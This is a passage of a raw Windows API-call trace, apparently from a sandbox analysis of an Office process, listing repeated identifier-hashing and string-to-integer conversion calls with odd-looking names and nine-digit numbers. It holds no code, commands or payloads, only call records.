LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="472762725") returned 10 [0067.814] VarI4FromStr (in: strIn="472762725", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="871337869") returned 10 [0067.814] VarI4FromStr (in: strIn="871337869", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.814] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="644341667") returned 10 [0067.815] VarI4FromStr (in: strIn="644341667", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="606372573") returned 10 [0067.815] VarI4FromStr (in: strIn="606372573", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.815] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="996137798") returned 10 [0067.815] VarI4FromStr (in: strIn="996137798", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.815] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NAZ1GBZA") returned 0x1031ef [0067.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="84556175") returned 9 [0067.815] VarI4FromStr (in: strIn="84556175", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.815] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lQGDDo1") returned 0x1072d6 [0067.815] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.815] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.816] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.816] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WAGAGA") returned 0x10d5f1 [0067.816] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mUGGoUUA") returned 0x108a0c [0067.816] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.816] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uABoA4A") returned 0x10ceec [0067.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="217351700") returned 10 [0067.816] VarI4FromStr (in: strIn="217351700", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.816] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wQQAwU_") returned 0x10a439 [0067.816] CExposedStream::Read () returned 0x0 [0067.816] CExposedStream::Read () returned 0x0 [0067.816] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b4AACAoX") returned 0x10ed79 [0067.816] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QABAA4ZA") returned 0x10451d [0067.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="566025955") returned 10 [0067.816] VarI4FromStr (in: strIn="566025955", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="592340144") returned 10 [0067.816] VarI4FromStr (in: strIn="592340144", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="64061074") returned 9 [0067.816] VarI4FromStr (in: strIn="64061074", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="624540855") returned 10 [0067.817] VarI4FromStr (in: strIn="624540855", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="469069229") returned 10 [0067.817] VarI4FromStr (in: strIn="469069229", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.817] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pXXwAZwG") returned 0x108ddf [0067.817] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.817] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zD1441UA") returned 0x10fda7 [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="333378862") returned 10 [0067.817] VarI4FromStr (in: strIn="333378862", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="700104026") returned 10 [0067.817] VarI4FromStr (in: strIn="700104026", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.817] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.817] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UZBAAAk") returned 0x1028fe [0067.817] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="801746366") returned 10 [0067.817] VarI4FromStr (in: strIn="801746366", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="896645019") returned 10 [0067.817] VarI4FromStr (in: strIn="896645019", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.818] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="121971839") returned 10 [0067.818] VarI4FromStr (in: strIn="121971839", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="26051198") returned 9 [0067.818] VarI4FromStr (in: strIn="26051198", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="995567524") returned 10 [0067.818] VarI4FromStr (in: strIn="995567524", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="292958805") returned 10 [0067.818] VarI4FromStr (in: strIn="292958805", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="400030532") returned 10 [0067.819] VarI4FromStr (in: strIn="400030532", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="260820532") returned 10 [0067.819] VarI4FromStr (in: strIn="260820532", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="672170738") returned 10 [0067.819] VarI4FromStr (in: strIn="672170738", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="431508459") returned 10 [0067.819] VarI4FromStr (in: strIn="431508459", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="21266687") returned 9 [0067.819] VarI4FromStr (in: strIn="21266687", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="766311552") returned 10 [0067.819] VarI4FromStr (in: strIn="766311552", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="588437940") returned 10 [0067.820] VarI4FromStr (in: strIn="588437940", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=9 | out: lpWideCharStr="80327324") returned 9 [0067.820] VarI4FromStr (in: strIn="80327324", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="728323763") returned 10 [0067.820] VarI4FromStr (in: strIn="728323763", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="691191016") returned 10 [0067.820] VarI4FromStr (in: strIn="691191016", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="906803784") returned 10 [0067.820] VarI4FromStr (in: strIn="906803784", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.820] VarI4FromStr (in: strIn="1654184", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="469469403") returned 10 [0067.820] VarI4FromStr (in: strIn="469469403", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.820] VarI4FromStr (in: strIn="897160739", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.821] VarI4FromStr (in: strIn="277382798", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.821] VarI4FromStr (in: strIn="222651767", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.821] VarI4FromStr (in: strIn="607780256", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.821] VarI4FromStr (in: strIn="281185897", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.821] VarI4FromStr (in: strIn="221906851", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.821] VarI4FromStr (in: strIn="846223082", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.821] VarI4FromStr (in: strIn="778609989", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.821] VarI4FromStr (in: strIn="121289567", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="989463102") returned 10 [0067.821] VarI4FromStr (in: strIn="989463102", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.821] VarI4FromStr (in: strIn="762944415", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="751001323") returned 10 [0067.822] VarI4FromStr (in: strIn="751001323", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.822] VarI4FromStr (in: strIn="99050338", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="815702806") returned 10 [0067.822] VarI4FromStr (in: strIn="815702806", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.822] VarI4FromStr (in: strIn="505655983", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.822] VarI4FromStr (in: strIn="616268833", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.822] VarI4FromStr (in: strIn="387786231", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.822] VarI4FromStr (in: strIn="694614073", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.822] VarI4FromStr (in: strIn="939399921", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.822] VarI4FromStr (in: strIn="525167734", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.823] VarI4FromStr (in: strIn="139388172", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.823] VarI4FromStr (in: strIn="298877906", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.823] VarI4FromStr (in: strIn="942444970", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="313293539") returned 10 [0067.823] VarI4FromStr (in: strIn="313293539", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.823] VarI4FromStr (in: strIn="557797100", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="978002983") returned 10 [0067.823] VarI4FromStr (in: strIn="978002983", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.823] VarI4FromStr (in: strIn="825226229", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x6885818, cchWideChar=10 | out: lpWideCharStr="316089534") returned 10 [0067.823] VarI4FromStr (in: strIn="316089534", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.823] VarI4FromStr (in: strIn="749775650", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] VarI4FromStr (in: strIn="538178929", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.824] VarI4FromStr (in: strIn="473403787", lcid=0x409, dwFlags=0x80000000, 